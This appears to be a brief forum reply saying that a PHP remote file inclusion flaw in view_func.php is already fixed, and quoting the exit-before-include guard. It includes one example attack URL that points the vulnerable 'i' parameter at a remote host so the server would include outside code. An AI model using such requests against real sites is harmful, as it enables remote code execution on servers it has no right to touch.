in the latest version this is already fixed, for almost a year. if (strpos ($_SERVER['PHP_SELF'], 'view_func.php') !== false) { exit (); } before the include! http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedi r/&l=testfile.txt? view_func.php will exit before the include.